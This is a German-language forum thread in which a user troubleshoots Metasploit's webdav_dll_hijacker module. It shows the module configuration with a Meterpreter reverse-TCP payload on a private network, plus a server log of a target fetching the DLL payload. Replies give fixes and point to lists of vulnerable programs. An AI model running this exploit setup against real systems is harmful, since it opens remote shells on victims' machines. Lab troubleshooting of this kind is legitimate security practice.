Results 1 to 7 of 7

Thread: webdav_dll_hijacker. session wird nicht geöffnet warum?

  1. #1
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    6

    Question webdav_dll_hijacker. session wird nicht geöffnet warum?

    Hallo zusammen

    Ich wollte mit "metasploit" den Exploit "webdav_dll_hijacker" versuchen.
    Dachte eigentlich das wäre kein Problem für mich aber scheinbar doch
    Ich habe den Exploit angewählt, einen PAYLOAD ausgesucht und den Server gestartet.

    Code:
    msf exploit(webdav_dll_hijacker) > show options 
    
    Module options:
    
       Name        Current Setting    Required  Description
       ----        ---------------    --------  -----------
       BASENAME    policy             yes       The base name for the listed files.
       EXTENSIONS  ppt pptx txt html  yes       The list of extensions to generate
       SHARENAME   test-share         yes       The name of the top-level share.
       SRVHOST     0.0.0.0            yes       The local host to listen on.
       SRVPORT     80                 yes       The daemon port to listen on (do not change)
       URIPATH     /                  yes       The URI to use (do not change).
    
    Payload options (windows/meterpreter/reverse_tcp):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  process          yes       Exit technique: seh, thread, process
       LHOST     192.168.1.127    yes       The listen address
       LPORT     30000            yes       The listen port
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    Wenn ich jetzt auf den Share zugreife, und eine ppt Datei mit PowerPoint öffne, passiert aber
    leider nichts. Es wird keine Session geöffnet.

    Hier mal ein Auszug

    Code:
    [*] 192.168.1.101:1849 PROPFIND /test-share/[*] 192.168.1.101:1849 PROPFIND => 207 Directory (/test-share/)[*] 192.168.1.101:1849 PROPFIND => 207 Top-Level Directory[*] 192.168.1.101:1848 PROPFIND /test-share/policy.ppt[*] 192.168.1.101:1848 PROPFIND => 207 File (/test-share/policy.ppt)[*] 192.168.1.101:1850 PROPFIND /test-share[*] 192.168.1.101:1850 PROPFIND => 301 (/test-share)[*] 192.168.1.101:1848 GET => DATA (/test-share/policy.ppt)[*] 192.168.1.101:1850 PROPFIND /test-share/[*] 192.168.1.101:1850 PROPFIND => 207 Directory (/test-share/)[*] 192.168.1.101:1850 PROPFIND => 207 Top-Level Directory[*] 192.168.1.101:1848 PROPFIND /TEST-SHARE[*] 192.168.1.101:1848 PROPFIND => 301 (/TEST-SHARE)[*] 192.168.1.101:1851 OPTIONS /test-share/[*] 192.168.1.101:1848 PROPFIND /TEST-SHARE/[*] 192.168.1.101:1848 PROPFIND => 207 Directory (/TEST-SHARE/)[*] 192.168.1.101:1848 PROPFIND => 207 Top-Level Directory[*] 192.168.1.101:1851 OPTIONS /[*] 192.168.1.101:1852 PROPFIND /TEST-SHARE[*] 192.168.1.101:1852 PROPFIND => 301 (/TEST-SHARE)[*] 192.168.1.101:1851 OPTIONS /test-share/policy.ppt[*] 192.168.1.101:1852 PROPFIND /TEST-SHARE/[*] 192.168.1.101:1852 PROPFIND => 207 Directory (/TEST-SHARE/)[*] 192.168.1.101:1852 PROPFIND => 207 Top-Level Directory[*] 192.168.1.101:1853 PROPFIND /test-share/wininet.dll[*] 192.168.1.101:1853 PROPFIND => 207 File (/test-share/wininet.dll)[*] 192.168.1.101:1854 PROPFIND /TEST-SHARE[*] 192.168.1.101:1854 PROPFIND => 301 (/TEST-SHARE)[*] 192.168.1.101:1853 GET => DLL Payload[*] 192.168.1.101:1854 PROPFIND /TEST-SHARE/[*] 192.168.1.101:1854 PROPFIND => 207 Directory (/TEST-SHARE/)[*] 192.168.1.101:1854 PROPFIND => 207 Top-Level Directory[*] 192.168.1.101:1851 OPTIONS /[*] 192.168.1.101:1851 OPTIONS /test-share/policy.ppt[*] 192.168.1.101:1851 GET => DATA (/test-share/policy.ppt)
    Kann mir jemand einen Tip geben?
    Danke

  2. #2
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    1

    Default Re: webdav_dll_hijacker. session wird nicht geöffnet warum?

    Hi

    Du musst so weit ich weiß musst du die Datei über den Webbrowser aufrufen (ist ja webdav) und nicht über direkt Share.
    Das wäre dann in deinem Fall http://192.168.1.127/test-share/

    Falls ich falsch liege ist hier nochmal eine ausführliche Anleitung
    Metasploit: Exploiting DLL Hijacking Flaws

    Hier noch ein Video von OffSec:
    Microsoft DLL Hijacking Exploit in Action
    Last edited by mr.p4yne; 08-27-2010 at 11:48 AM.

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    6

    Default Re: webdav_dll_hijacker. session wird nicht geöffnet warum?

    Dieses Video habe ich in der Zwischenzeit schon gesehen und ich mache es genau so wie im Video über den Internet Explorer. Habe jetzt sogar noch ein Windows XP ohne Updates/SP3 versucht. Kein Erfolg...

  4. #4
    Moderator
    Join Date
    Jan 2010
    Posts
    167

    Default Re: webdav_dll_hijacker. session wird nicht geöffnet warum?


  5. #5
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    6

    Default Re: webdav_dll_hijacker. session wird nicht geöffnet warum?

    So nach einen Update von msf hat es jetzt geklappt
    Fehler lag wohl auch noch daran, dass ich PowerPoint 2003 verwendet habe.
    Mit 2007 klappt es.

    Danke

  6. #6
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    5

    Default Re: webdav_dll_hijacker. session wird nicht geöffnet warum?

    Versuche es mit mehreren Endungen. Schaust du hier:

    ………..und der Admin hyperventilierte » Blog Archive » DLL-Hijacking prof of concept…

    Alle Endungen führten bei mir zu einer Session.

    Eine inoffizielle Liste aller angreifbaren Programme findest du hier:

    http://www.corelan.be:8800/index.php...official-list/

    Grüße

    Vito

  7. #7
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    6

    Default Re: webdav_dll_hijacker. session wird nicht geöffnet warum?

    mein kommentar ist leider noch nicht aufgeschaltet.
    Problem ist gelöst nach einem update...

Similar Threads

  1. Karte wird nicht angezeigt
    By huzzo in forum Anfänger Ecke
    Replies: 1
    Last Post: 06-29-2010, 09:05 PM
  2. D-Link DWL-G122 wird nicht erkannt?
    By Nawuko in forum Hardware support
    Replies: 3
    Last Post: 01-25-2010, 03:58 PM
  3. Wordlist wird nicht geladen
    By insideman in forum Anfänger Ecke
    Replies: 4
    Last Post: 01-12-2010, 01:25 PM
  4. Bluetooth wird nicht erkannt.
    By ๑oxford๑ in forum Hardware support
    Replies: 4
    Last Post: 12-17-2009, 09:01 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •